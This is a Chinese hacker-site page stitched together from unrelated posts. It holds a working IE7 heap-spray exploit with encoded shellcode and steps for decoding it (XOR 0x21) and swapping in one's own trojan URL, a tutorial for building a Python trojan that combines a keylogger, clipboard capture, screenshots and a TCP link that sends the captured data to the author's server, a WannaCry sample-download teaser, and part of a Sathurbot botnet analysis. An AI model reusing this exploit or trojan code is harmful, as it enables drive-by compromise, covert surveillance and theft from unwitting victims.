2017最新ie0day样本网马修改~

最近流行的最新网马IE70day+shellcode+exe样本已经出来了,刚刚看到,感觉蛮新奇的,毕竟现在还是样本,想把它改成自己的马还得费一番功夫。目前的网马一般改下shellcode就ok了。不过听别人说,如果单纯改shellcode的话,ie会出现崩溃,所以要找到适合得shellcode还是得费一番功夫,不过,有现成的,不用不是浪费么?废话不多说,分析开始。

网马的样本如下更多关注www.hackerschina.org

复制内容到剪贴板

代码:

if(navigator.userAgent.toLowerCase().indexOf(“msie 7”)==-1)location.replace(“about:blank”);

function sleep(milliseconds)

{

var start=new Date().getTime();

for(var i=0;i<1e7;i++)

{if((new Date().getTime()-start)>milliseconds)

{break}

}

}

function spray(sc)

{

var infect=unescape(sc.replace(/dadong/g,”\x25\x75″));

var heapBlockSize=0x100000;

var payLoadSize=infect.length*2;

var szlong=heapBlockSize-(payLoadSize+0x038);

var retVal=unescape(“%u0a0a%u0a0a”);

retVal=getSampleValue(retVal,szlong);

aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;

zzchuck=new Array();

for(i=0;i<aaablk;i++){zzchuck=retval+infect}< p=””>

}

function getSampleValue(retVal,szlong)

{

while(retVal.length*2<szlong)< p=””>

{retVal+=retVal}

retVal=retVal.substring(0,szlong/2);

return retVal

}

var a1=”dadong”;

spray(a1+”9090″+a1+”dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031Cdadong31C3dadong66C9dadongE981dadongFA65dadong3080dadong4021dadongFAE2dadong17C9dadong2122dadong4921dadong0121dadong2121dadong214BdadongF1DEdadong2198dadong2131dadongAA21dadongCAD9dadong7F24dadong85D2dadongF1DEdadongD7C9dadongDEDEdadongC9DEdadong221Cdadong2121dadongD9AAdadong19C9dadong2121dadongC921dadong206Cdadong2121dadong67C9dadong2121dadongC921dadong22FAdadong2121dadongD9AAdadong03C9dadong2121dadongC921dadong2065dadong2121dadong11C9dadong2121dadongC921dadong22A8dadong2121dadongD9AAdadong2DC9dadong2121dadongC921dadong2040dadong2121dadong3BC9dadong2121dadongCA21dadong7279dadongFDAAdadong4B72dadong4961dadong3121dadong2121dadongC976dadong2390dadong2121dadongC4C9dadong2121dadong7921dadong72E2dadongFDAAdadong4B72dadong4901dadong3121dadong2121dadongC976dadong23B8dadong2121dadongECC9dadong2121dadong7921dadong76E2dadong1DC9dadong2125dadongAA21dadong12D9dadong68E8dadongE112dadongE291dadongD3DDdadongAC8FdadongDE66dadongE27Edadong1F7Adadong26E7dadong1F99dadong7EA8dadong4720dadongE61Fdadong2466dadongC1DEdadongC8E2dadong25B4dadong2121dadongA07Adadong35CDdadong2120dadongAA21dadong1FF5dadong23E6dadong4C42dadong0145dadongE61Fdadong2563dadong420Edadong0301dadongE3A2dadong1229dadong71E1dadong4971dadong2025dadong2121dadong7273dadongC971dadong22E0dadong2121dadongF1DEdadongDDAAdadongE6AAdadongE1A2dadong1F29dadong39ABdadongFAA5dadong2255dadongCA61dadong1FD7dadong21E7dadong1203dadong1FF3dadong71A9dadongA220dadong75CDdadongE112dadongFA12dadongEDAAdadongD9A2dadong5C75dadong1F28dadong3DA8dadongA220dadong25E1dadongD3CAdadongEDAAdadongF8AAdadongE2A2dadong1231dadong1FE1dadong62E6dadong200Ddadong2121dadong7021dadong7172dadong7171dadong7171dadong7671dadongC971dadong2218dadong2121dadong38C9dadong2121dadong4521dadong2580dadong2121dadongAC21dadong4181dadongDEDEdadongC9DEdadong2216dadong2121dadongFA12dadong7272dadong7272dadongF1DEdadong19A1dadongA1C9dadongC819dadong2E54dadong59A0dadongB124dadongB1B1dadong55B1dadong7427dadongCDAAdadong61ACdadongDE24dadongC9C1dadongDE0FdadongDEDEdadongC9E2dadongDE09dadongDEDEdadong3099dadong2520dadongE3A1dadong212Ddadong3AC9dadongDEDEdadong12DEdadong71E1dadongC975dadong2175dadong2121dadongC971dadong23AAdadong2121dadongF1DEdadongA117dadong051Ddadong5621dadongC92Bdadong2360dadong2121dadongDE12dadongDE76dadongC9F1dadong20DAdadong2121dadongDE49dadong2121dadongDE21dadongC9F1dadongDFC9dadongDEDEdadong7672dadong1277dadong71E1dadongC975dadong213Fdadong2121dadongC971dadong2374dadong2121dadongF1DEdadongA117dadong051Ddadong5621dadongC92Bdadong232Adadong2121dadongDE12dadongDE76dadong79F1dadong7E7FdadongE27Adadong23CAdadongE279dadongD8C9dadongDEDEdadong77DEdadongA276dadong29CDdadongDDAAdadong294Bdadong1F76dadong56DEdadongC935dadong237Cdadong2121dadongF1DEdadongDDAAdadong4049dadong444Cdadong4921dadong6468dadong5367dadongD5AAdadong2998dadong2121dadongD221dadong5487dadong4B0Edadong1F21dadong55DEdadong0105dadong05C9dadong2123dadongDE21dadongAAF1dadongC9D9dadong20EAdadong2121dadongF1DEdadongD91Adadong2955dadongAA17dadong0565dadong1F01dadong21DEdadongDE1Fdadong0555dadongC93Ddadong20CEdadong2121dadongF1DEdadongE5A2dadong7E31dadong997Fdadong2120dadong2121dadong49E2dadong4F4Edadong2121dadong5449dadong4D53dadongCA4CdadongAC34dadong0565dadong7125dadong03C9dadongDEDFdadong71DEdadong6BC9dadong2123dadongC821dadongDFC3dadongDEDEdadongC7C9dadongDEDEdadongA2DEdadong29E5dadong4BE2dadong494Ddadong554Fdadong4D45dadong34CAdadong65ACdadong2505dadongC971dadongDCDAdadongDEDEdadongC971dadong2302dadong2121dadong9AC8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong1249dadong2113dadong4921dadong5254dadong5344dadong34CAdadong65ACdadong2505dadongC971dadongDCF0dadongDEDEdadongC971dadong20D8dadong2121dadongB0C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong4249dadong5657dadong4921dadong4952dadong4E45dadong34CAdadong65ACdadong2505dadongC971dadongDC86dadongDEDEdadongC971dadong20EEdadong2121dadong46C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong5749dadong5946dadongCA21dadongAC34dadong0565dadong7125dadongA3C9dadongDEDCdadong71DEdadong8BC9dadong2120dadongC821dadongDF63dadongDEDEdadongC7C9dadongDEDEdadongA2DEdadong25E5dadongC9E2dadong208Adadong2121dadong3A49dadong67E7dadong7158dadongE7C9dadong2120dadongA221dadong29E5dadongC9E2dadong20B6dadong2121dadongCD49dadong22B6dadong712Ddadong93C9dadong2120dadongA221dadong29E5dadongC9E2dadong20A2dadong2121dadong8B49dadong2CDDdadong715DdadongBFC9dadong2120dadongA221dadong29E5dadongC9E2dadong204Edadong2121dadongCC49dadongCE77dadong7117dadongABC9dadong2120dadongA221dadong29E5dadongC9E2dadong207Adadong2121dadongD149dadong25ABdadong717Edadong57C9dadong2120dadongA221dadong29E5dadongC9E2dadongDFD6dadongDEDEdadong5949dadongFA49dadong713Ddadong43C9dadong2120dadongA221dadong29E5dadongC9E2dadong2012dadong2121dadongCE49dadongC1EFdadong7141dadong6FC9dadong2120dadongA221dadong29E5dadongC9E2dadong203Edadong2121dadong9149dadong0C68dadong71FAdadong1BC9dadong2120dadongA221dadong29E5dadongC9E2dadongDE17dadongDEDEdadong8A49dadongBA7Fdadong713Fdadong07C9dadong2120dadongA221dadong29E5dadongC9E2dadongDF86dadongDEDEdadong7849dadongA0B6dadong7123dadong33C9dadong2120dadongA221dadong29E5dadongC9E2dadong21C2dadong2121dadong5F49dadongC3F9dadong7152dadongDFC9dadong2121dadongA221dadong29E5dadongC9E2dadong21EEdadong2121dadongBF49dadong9AD8dadong7114dadongCBC9dadong2121dadongA221dadong29E5dadongC9E2dadongDFB3dadongDEDEdadong7649dadong9481dadong719AdadongF7C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF5FdadongDEDEdadong3B49dadong3F5Bdadong7123dadongE3C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF4BdadongDEDEdadongC149dadong117Adadong71B5dadong8FC9dadong2121dadongA221dadong29E5dadongC9E2dadongDF77dadongDEDEdadongB649dadongC3E8dadong7182dadongBBC9dadong2121dadongA221dadong29E5dadongC9E2dadongDF63dadongDEDEdadong4949dadongE405dadong7192dadongA7C9dadong2121dadongA221dadong29E5dadongC9E2dadong2176dadong2121dadong5349dadong92DFdadong7137dadong53C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF65dadongDEDEdadong32CAdadong444BdadongC971dadongDAD6dadongDEDEdadongC971dadongDF8AdadongDEDEdadong96C8dadongDEDDdadongC9DEdadongDEC9dadongDEDEdadongC9E2dadongDC88dadongDEDEdadong6E49dadong6ECEdadong7124dadong1FC9dadong2121dadongA221dadong29E5dadongC9E2dadong212Edadong2121dadongAF49dadong2F6Fdadong71CDdadong0BC9dadong2121dadongA221dadong29E5dadong12E2dadong45E1dadong61AAdadongA411dadong59E1dadong1F31dadong61AAdadong1F2Ddadong51AAdadong8C3DdadongAA1Fdadong2961dadongCAE2dadong1F2Adadong61AAdadongA215dadong5DE1dadongAA1Fdadong1D61dadong41E2dadongAA17dadong054Ddadong1705dadong64AAdadong171Ddadong75AAdadong5924dadongF422dadongAA1Fdadong396BdadongAA1Fdadong017BdadongFC22dadong1AC2dadong1F68dadong15AAdadong22AAdadong12D4dadong12DEdadongDDE1dadongA58Ddadong55E1dadongE026dadong2CEEdadongD922dadongD5CAdadong1A17dadong055Ddadong5409dadong1FFEdadong7BAAdadong2205dadong47FCdadongAA1Fdadong6A2DdadongAA1Fdadong3D7BdadongFC22dadongAA1FdadongAA25dadongE422dadongA817dadong0565dadong403DdadongC9E2dadongDA47dadongDEDEdadong5549dadong5155dadong0E1Bdadong560Edadong5656dadong430Fdadong4840dadong444Adadong0F42dadong4F42dadong450Edadong564Edadong0E4Fdadong4E4Adadong440Fdadong4459dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong0021″);

sleep(3000);

nav=navigator.userAgent.toLowerCase();

if(navigator.appVersion.indexOf(‘MSIE’)!=-1)

{

version=parseFloat(navigator.appVersion.split(‘MSIE’)[1])

}

if(version==7)

{

w2k3=((nav.indexOf(‘windows nt 5.2’)!=-1)||(nav.indexOf(‘windows 2003’)!=-1));

wxp=((nav.indexOf(‘windows nt 5.1’)!=-1)||(nav.indexOf(‘windows xp’)!=-1));

if(wxp||w2k3)document.write(‘]]>’);

var i=1;while(i<=10)

{

window.status=” “;i++}

}

   

首先,大家肯定会查找shellcode在哪里,这个样本得shellcode刚刚看起来貌似和其他的马有些不同,是

a1+”9090″+a1+”dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031

的形式,其实明白人一看就出来,这样得加密其实很容易解,解密函数就是sc.replace(/dadong/g,”\x25\x75″)了。

解开之后,shellcode就露出庐山真面目了

复制内容到剪贴板

代码:

u9090%u%u9090%u9090%uE1D9%u34D9%u5824%u5858%u3358%uB3DB%u031C%u31C3%u66C9%uE981%uFA65%u3080%u4021%uFAE2%u17C9%u2122%u4921%u0121%u2121%u214B%uF1DE%u2198%u2131%uAA21%uCAD9%u7F24%u85D2%uF1DE%uD7C9%uDEDE%uC9DE%u221C%u2121%uD9AA%u19C9%u2121%uC921%u206C%u2121%u67C9%u2121%uC921%u22FA%u2121%uD9AA%u03C9%u2121%uC921%u2065%u2121%u11C9%u2121%uC921%u22A8%u2121%uD9AA%u2DC9%u2121%uC921%u2040%u2121%u3BC9%u2121%uCA21%u7279%uFDAA%u4B72%u4961%u3121%u2121%uC976%u2390%u2121%uC4C9%u2121%u7921%u72E2%uFDAA%u4B72%u4901%u3121%u2121%uC976%u23B8%u2121%uECC9%u2121%u7921%u76E2%u1DC9%u2125%uAA21%u12D9%u68E8%uE112%uE291%uD3DD%uAC8F%uDE66%uE27E%u1F7A%u26E7%u1F99%u7EA8%u4720%uE61F%u2466%uC1DE%uC8E2%u25B4%u2121%uA07A%u35CD%u2120%uAA21%u1FF5%u23E6%u4C42%u0145%uE61F%u2563%u420E%u0301%uE3A2%u1229%u71E1%u4971%u2025%u2121%u7273%uC971%u22E0%u2121%uF1DE%uDDAA%uE6AA%uE1A2%u1F29%u39AB%uFAA5%u2255%uCA61%u1FD7%u21E7%u1203%u1FF3%u71A9%uA220%u75CD%uE112%uFA12%uEDAA%uD9A2%u5C75%u1F28%u3DA8%uA220%u25E1%uD3CA%uEDAA%uF8AA%uE2A2%u1231%u1FE1%u62E6%u200D%u2121%u7021%u7172%u7171%u7171%u7671%uC971%u2218%u2121%u38C9%u2121%u4521%u2580%u2121%uAC21%u4181%uDEDE%uC9DE%u2216%u2121%uFA12%u7272%u7272%uF1DE%u19A1%uA1C9%uC819%u2E54%u59A0%uB124%uB1B1%u55B1%u7427%uCDAA%u61AC%uDE24%uC9C1%uDE0F%uDEDE%uC9E2%uDE09%uDEDE%u3099%u2520%uE3A1%u212D%u3AC9%uDEDE%u12DE%u71E1%uC975%u2175%u2121%uC971%u23AA%u2121%uF1DE%uA117%u051D%u5621%uC92B%u2360%u2121%uDE12%uDE76%uC9F1%u20DA%u2121%uDE49%u2121%uDE21%uC9F1%uDFC9%uDEDE%u7672%u1277%u71E1%uC975%u213F%u2121%uC971%u2374%u2121%uF1DE%uA117%u051D%u5621%uC92B%u232A%u2121%uDE12%uDE76%u79F1%u7E7F%uE27A%u23CA%uE279%uD8C9%uDEDE%u77DE%uA276%u29CD%uDDAA%u294B%u1F76%u56DE%uC935%u237C%u2121%uF1DE%uDDAA%u4049%u444C%u4921%u6468%u5367%uD5AA%u2998%u2121%uD221%u5487%u4B0E%u1F21%u55DE%u0105%u05C9%u2123%uDE21%uAAF1%uC9D9%u20EA%u2121%uF1DE%uD91A%u2955%uAA17%u0565%u1F01%u21DE%uDE1F%u0555%uC93D%u20CE%u2121%uF1DE%uE5A2%u7E31%u997F%u2120%u2121%u49E2%u4F4E%u2121%u5449%u4D53%uCA4C%uAC34%u0565%u7125%u03C9%uDEDF%u71DE%u6BC9%u2123%uC821%uDFC3%uDEDE%uC7C9%uDEDE%uA2DE%u29E5%u4BE2%u494D%u554F%u4D45%u34CA%u65AC%u2505%uC971%uDCDA%uDEDE%uC971%u2302%u2121%u9AC8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u1249%u2113%u4921%u5254%u5344%u34CA%u65AC%u2505%uC971%uDCF0%uDEDE%uC971%u20D8%u2121%uB0C8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u4249%u5657%u4921%u4952%u4E45%u34CA%u65AC%u2505%uC971%uDC86%uDEDE%uC971%u20EE%u2121%u46C8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u5749%u5946%uCA21%uAC34%u0565%u7125%uA3C9%uDEDC%u71DE%u8BC9%u2120%uC821%uDF63%uDEDE%uC7C9%uDEDE%uA2DE%u25E5%uC9E2%u208A%u2121%u3A49%u67E7%u7158%uE7C9%u2120%uA221%u29E5%uC9E2%u20B6%u2121%uCD49%u22B6%u712D%u93C9%u2120%uA221%u29E5%uC9E2%u20A2%u2121%u8B49%u2CDD%u715D%uBFC9%u2120%uA221%u29E5%uC9E2%u204E%u2121%uCC49%uCE77%u7117%uABC9%u2120%uA221%u29E5%uC9E2%u207A%u2121%uD149%u25AB%u717E%u57C9%u2120%uA221%u29E5%uC9E2%uDFD6%uDEDE%u5949%uFA49%u713D%u43C9%u2120%uA221%u29E5%uC9E2%u2012%u2121%uCE49%uC1EF%u7141%u6FC9%u2120%uA221%u29E5%uC9E2%u203E%u2121%u9149%u0C68%u71FA%u1BC9%u2120%uA221%u29E5%uC9E2%uDE17%uDEDE%u8A49%uBA7F%u713F%u07C9%u2120%uA221%u29E5%uC9E2%uDF86%uDEDE%u7849%uA0B6%u7123%u33C9%u2120%uA221%u29E5%uC9E2%u21C2%u2121%u5F49%uC3F9%u7152%uDFC9%u2121%uA221%u29E5%uC9E2%u21EE%u2121%uBF49%u9AD8%u7114%uCBC9%u2121%uA221%u29E5%uC9E2%uDFB3%uDEDE%u7649%u9481%u719A%uF7C9%u2121%uA221%u29E5%uC9E2%uDF5F%uDEDE%u3B49%u3F5B%u7123%uE3C9%u2121%uA221%u29E5%uC9E2%uDF4B%uDEDE%uC149%u117A%u71B5%u8FC9%u2121%uA221%u29E5%uC9E2%uDF77%uDEDE%uB649%uC3E8%u7182%uBBC9%u2121%uA221%u29E5%uC9E2%uDF63%uDEDE%u4949%uE405%u7192%uA7C9%u2121%uA221%u29E5%uC9E2%u2176%u2121%u5349%u92DF%u7137%u53C9%u2121%uA221%u29E5%uC9E2%uDF65%uDEDE%u32CA%u444B%uC971%uDAD6%uDEDE%uC971%uDF8A%uDEDE%u96C8%uDEDD%uC9DE%uDEC9%uDEDE%uC9E2%uDC88%uDEDE%u6E49%u6ECE%u7124%u1FC9%u2121%uA221%u29E5%uC9E2%u212E%u2121%uAF49%u2F6F%u71CD%u0BC9%u2121%uA221%u29E5%u12E2%u45E1%u61AA%uA411%u59E1%u1F31%u61AA%u1F2D%u51AA%u8C3D%uAA1F%u2961%uCAE2%u1F2A%u61AA%uA215%u5DE1%uAA1F%u1D61%u41E2%uAA17%u054D%u1705%u64AA%u171D%u75AA%u5924%uF422%uAA1F%u396B%uAA1F%u017B%uFC22%u1AC2%u1F68%u15AA%u22AA%u12D4%u12DE%uDDE1%uA58D%u55E1%uE026%u2CEE%uD922%uD5CA%u1A17%u055D%u5409%u1FFE%u7BAA%u2205%u47FC%uAA1F%u6A2D%uAA1F%u3D7B%uFC22%uAA1F%uAA25%uE422%uA817%u0565%u403D%uC9E2%uDA47%uDEDE%u5549%u5155%u0E1B%u560E%u5656%u430F%u4840%u444A%u0F42%u4F42%u450E%u564E%u0E4F%u4E4A%u440F%u4459%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u0021有了shellcode,下一步就是抄家伙分析了,首先把shellcode转换成exe文件,用OD载入

单步跟踪,到如下位置的时候注意了

如图所示

 

XOR BYTE PIR DS:[EAX],21

这个是负责shellcode解密得函数了,由于shellcode用的是异或加密,并且从这里可以看出密钥是21,这就好办啦~~~

我们把shellcode的 复制内容到剪贴板 代码:%u5549%u5155%u0E1B%u560E%u5656%u430F%u4840%u444A%u0F42%u4F42%u450E%u564E%u0E4F%u4E4A%u440F%u4459%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u0021

 

知道了以上这些原理,把这个网马改成自己得马就简单了!

我们只要把自己马的地址用21异或运算,并且转换成unicode替换原来的那些,并且按照原理得方法加密unicode,网马的改造就算完成了!!!

知道了道理,写生成器也就不是什么难事了~~~

中国骇客云教你使用Python编写木马程序

这次我们运用Python编写一个具有键盘记载、截屏以及通讯功用的简易木马,仍然选用Sublimetext2+JEDI(python自动补全插件)来写代码。首先准备好我们需求的依赖库,pythonhook和pythoncom。

假如觉得费事,你能够直接运用集成了一切我们所需求的python库的商业版Activepython。记载你所敲打的一切:编写一个keylogger说起Keylogger,大家的思想可能早已飞向带有wifi功用的mini小硬件去了。抛开高科技,我们暂且回归实质,探探简易键盘记载器的原理与完成。Pythonkeylogger键盘记载的功用的完成主要应用了pythoncom及pythonhook,然后就是对windowsAPI的各种调用。Python之所以用起来便当快捷,主要归功于这些庞大的支持库,正所谓“人生苦短,快用Python”。关键代码如下所示:

#-*-coding:utf-8-*-fromctypesimport*importpythoncomimportpyHookimportwin32clipboarduser32=windll.user32kernel32=windll.kernel32psapi=windll.psapicurrent_window=None#defget_current_process():#获取最上层的窗口句柄hwnd=user32.GetForegroundWindow()#获取进程IDpid=c_ulong(0)user32.GetWindowThreadProcessId(hwnd,byref(pid))#将进程ID存入变量中process_id="%d"%pid.value#申请内存executable=create_string_buffer("\x00"*512)h_process=kernel32.OpenProcess(0x400|0x10,False,pid)psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)#读取窗口标题windows_title=create_string_buffer("\x00"*512)length=user32.GetWindowTextA(hwnd,byref(windows_title),512)#打印printprint"[PID:%s-%s-%s]"%(process_id,executable.value,windows_title.value)print#关闭handleskernel32.CloseHandle(hwnd)kernel32.CloseHandle(h_process)#定义击键监听事情函数defKeyStroke(event):globalcurrent_window#检测目的窗口能否转移(换了其他窗口就监听新的窗口)ifevent.WindowName!=current_window:current_window=event.WindowName#函数调用get_current_process()#检测击键能否常规按键(非组合键等)ifevent.Ascii>32andevent.Ascii<127:printchr(event.Ascii),else:#假如发现Ctrl+v(粘贴)事情,就把粘贴板内容记载下来ifevent.Key=="V":win32clipboard.OpenClipboard()pasted_value=win32clipboard.GetClipboardData()win32clipboard.CloseClipboard()print"[PASTE]-%s"%(pasted_value),else:print"[%s]"%event.Key,#循环监听下一个击键事情returnTrue#创立并注册hook管理器kl=pyHook.HookManager()kl.KeyDown=KeyStroke#注册hook并执行kl.HookKeyboard()pythoncom.PumpMessages()

【学问点】钩子(Hook):Windows音讯处置机制的一个平台,应用程序能够在上面设置子程以监视指定窗口的某种音讯,而且所监视的窗口能够是其他进程所创立的。编写代码时一定要留意严厉辨别大小写,检查无误后启动keylogger,然后能够尝试翻开记事本写点东西,过程中能够看到我们的keylogger窗口正在对我们的输入实时记载,如图1所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631280829472.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

图1

切换窗口时会自动跟踪到新窗口,light教授趁机骚扰一下疯狗,能够看到我们的keylogger曾经跟踪到QQ聊天窗口,并忠实的记载下输入的一切,如图2所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631289746044.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

图2

看看你在干什么:编写一个screenshotter截屏完成起来更简单,直接调用几个GUI相关的API即可,我们直接看代码。

#-*-coding:utf-8-*-importwin32guiimportwin32uiimportwin32conimportwin32api#获取桌面hdesktop=win32gui.GetDesktopWindow()#分辨率顺应width=win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)height=win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)left=win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)top=win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)#创立设备描绘表desktop_dc=win32gui.GetWindowDC(hdesktop)img_dc=win32ui.CreateDCFromHandle(desktop_dc)#创立一个内存设备描绘表mem_dc=img_dc.CreateCompatibleDC()#创立位图对象screenshot=win32ui.CreateBitmap()screenshot.CreateCompatibleBitmap(img_dc,width,height)mem_dc.SelectObject(screenshot)#截图至内存设备描绘表mem_dc.BitBlt((0,0),(width,height),img_dc,(left,top),win32con.SRCCOPY)#将截图保管到文件中screenshot.SaveBitmapFile(mem_dc,'c:\\WINDOWS\\Temp\\screenshot.bmp')#内存释放mem_dc.DeleteDC()win32gui.DeleteObject(screenshot.GetHandle())

运转之后看看效果如何,如图3所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631310619179.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

图3

综合运用:完成一个简易木马

无论是keylogger记载下的内容,还是screenshotter截获的图片,只存在客户端是没有太大意义的,我们需求构建一个简单server和client端来停止通讯,传输记载下的内容到我们的效劳器上。

1)编写一个简单的TCPclient

#-*-coding:utf-8-*-importsocket#目的地址IP/URL及端口target_host="127.0.0.1"target_port=9999#创立一个socket对象client=socket.socket(socket.AF_INET,socket.SOCK_STREAM)#衔接主机client.connect((target_host,target_port))#发送数据client.send("GET/HTTP/1.1\r\nHOST:127.0.0.1\r\n\r\n")#接纳响应response=client.recv(4096)printresponse

2)编写一个简单的TCPserver

#-*-coding:utf-8-*-importsocketimportthreading#监听的IP及端口bind_ip="127.0.0.1"bind_port=9999server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)server.bind((bind_ip,bind_port))server.listen(5)print"[*]Listeningon%s:%d"%(bind_ip,bind_port)defhandle_client(client_socket):request=client_socket.recv(1024)print"[*]Received:%s"%requestclient_socket.send("ok!")client_socket.close()whileTrue:client,addr=server.accept()print"[*]Acceptconnectionfrom:%s:%d"%(addr[0],addr[1])client_handler=threading.Thread(target=handle_client,args=(client,))client_handler.start()

开启效劳端监听,如图4所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631323537986.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631335392821.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

执行客户端,如图5所示。

效劳端接纳到客户端的恳求并做出了响应,如图6所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631342512153.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

图6更多关注www.hackerschina.org

最后需求做的就是把上面三个模块分离起来,一个简易的具有键盘记载、屏幕截图并能够发送内容到我们效劳端的木马就完成了。能够运用py2exe把脚本生成exe可执行文件。当然,你还能够继续发挥,加上远程控制功用。

“永恒之蓝”勒索病毒样本下载,WannaCry(永恒之蓝)的电脑勒索病毒及其变种下载,中国骇客云平台!

网上收集整理了已有的样本MD5,如果中国地区不能正常的下载到此病毒样本可以进行翻墙或者是进行vpn代理下载即可,下载地址:
继续阅读““永恒之蓝”勒索病毒样本下载,WannaCry(永恒之蓝)的电脑勒索病毒及其变种下载,中国骇客云平台!”

Sathurbot: Distributed WordPress password attack HackersChina分布式WordPress密码攻击

This article sheds light on the current ecosystem of the Sathurbot backdoor trojan, in particular exposing its use of torrents as a delivery medium and its distributed brute-forcing of weak WordPress administrator accounts.

The torrent leecher

Looking to download a movie or software without paying for it? There might be associated risks. It just might happen that your favorite search engine returns links to torrents on sites that normally have nothing to do with file sharing. They may, however, run WordPress and have simply been compromised.

Some examples of search results:

Clicking on some of those links returns the pages below (notice how some even use HTTPS):

The movie subpages all lead to the same torrent file; while all the software subpages lead to another torrent file. When you begin torrenting in your favorite torrent client, you will find the file is well-seeded and thus appears legitimate. If you download the movie torrent, its content will be a file with a video extension accompanied by an apparent codec pack installer, and an explanatory text file. The software torrent contains an apparent installer executable and a small text file. The objective of both is to entice get the victim to run the executable which loads the Sathurbot DLL.

After you start the executable, you are presented with a message like this:

While you ponder your options, bad things start to happen in the background. You have just become a bot in the Sathurbot network.

Backdoor and downloader

On startup, Sathurbot retrieves its C&C with a query to DNS. The response comes as a DNS TXT record. Its hex string value is decrypted and used as the C&C domain name for status reporting, task retrieval and to get links to other malware downloads.

Sathurbot can update itself and download and start other executables. We have seen variations ofBoaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list.

The Sathurbot then reports its successful installation along with a listening port to the C&C. Periodically, it reports to the C&C that it is alive and well, waiting for additional tasks.

Web crawler

Sathurbot comes with some 5,000 plus basic generic words. These are randomly combined to form a 2-4 word phrase combination used as a query string via the Google, Bing and Yandex search engines.

From the webpages at each of those search result URLs, a random 2-4 word long text chunk is selected (this time it might be more meaningful as it is from real text) and used for the next round of search queries.

Finally, the second set of search results (up to first three pages) are harvested for domain names.

The extracted domain names are all subsequently probed for being created by the WordPress framework. The trick here is to check the response for the URL http://[domain_name]/wp-login.php.

Afterward the root index page of the domain is fetched and probed for the presence of other frameworks. Namely, they are also interested in: Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS.

Upon startup, or at certain time intervals, the harvested domains are sent to the C&C (a different domain is used than the one for the backdoor – a hardcoded one).

Distributed WordPress password attack

The client is now ready to get a list of domain access credentials (formatted aslogin:password@domain) to probe for passwords. Different bots in Sathurbot’s botnet try different login credentials for the same site. Every bot only attempts a single login per site and moves on. This design helps ensure that the bot doesn’t get its IP address blacklisted from any targeted site and can revisit it in the future.

During our testing, lists of 10,000 items to probe were returned by the C&C.

For the attack itself, the XML-RPC API of WordPress is used. Particularly the wp.getUsersBlogsAPI is abused. A typical request looks like:

The sequence of probing a number of domain credentials is illustrated in the following figure:

The response is evaluated and results posted to the C&C.

Torrent client – seeder

The bot has the libtorrent library integrated and one of the tasks is to become a seeder – a binary file is downloaded, torrent created and seeded.

The BitTorrent bootstrap

That completes the cycle from a leecher to an involuntary seeder:

Note: Not every bot in the network is performing all the functions, some are just web crawlers, some just attack the XML-RPC API, and some do both. Also, not every bot seems to be seeding a torrent.

Impact

